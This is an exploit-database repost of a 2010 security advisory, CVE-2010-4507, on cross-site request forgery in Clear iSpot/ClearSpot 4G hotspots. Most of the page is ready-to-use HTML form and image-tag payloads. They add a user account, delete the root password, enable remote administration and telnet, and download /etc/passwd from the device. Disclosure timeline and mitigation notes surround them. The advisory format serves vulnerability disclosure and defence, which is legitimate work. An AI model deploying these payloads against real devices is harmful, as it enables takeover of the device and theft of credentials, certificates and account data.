[webapps / 0day] - Clear iSpot/Clearspot CSRF Vulnerabilitie
Posted on 12 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Clear iSpot/Clearspot CSRF Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Clear iSpot/Clearspot CSRF Vulnerabilities by Trustwave's Spide. in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================== Clear iSpot/Clearspot CSRF Vulnerabilities ========================================== Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com <http://www.clear.com/>) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. The specific versions used during testing are given below. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name : IMW-C615W Device Manufacturer : INFOMARK (http://infomark.co.kr <http://infomark.co.kr/>) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. The following examples will allow an attacker to enable remote access to the iSpot and ClearSpot 4G, and add their own account to the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="adduser -S jaku"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser% 20-S%20jaku'> Remove root password: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="passwd -d root"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2 0-d%20root'> Enable remote administration access: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="enable_remote_access" value="YES"> <input type="hidden" name="remote_access_port" value="80"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_network_set&enable_remo te_access=YES&remote_access_port=80'> Enable telnet if not already enabled: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_set_wimax_etc_config"> <input type="hidden" name="ENABLE_TELNET" value="YES"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN ABLE_TELNET=YES'> Allow remote telnet access: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="add_enable" value="YES"> <input type="hidden" name="add_host_ip" value="1"> <input type="hidden" name="add_port" value="23"> <input type="hidden" name="add_protocol" value="BOTH"> <input type="hidden" name="add_memo" value="admintelnet"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_network_set&add_enable= YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'> Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: <form method="post" action="http://server/cgi-bin/upgrademain.cgi <http://server/cgi-bin/upgrademain.cgi> "> <input type="hidden" name="act" value="act_file_download"> <input type="hidden" name="METHOD" value="PATH"> <input type="hidden" name="FILE_PATH" value="/etc/passwd"> <input type="submit"> </form> or <img src='http://server/cgi-bin/upgrademain.cgi?act=act_file_download&METHO D=PATH&FILE_PATH=/etc/passwd'> Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. # <a href='http://1337db.com/'>1337db.com</a> [2010-12-12]</pre></body></html>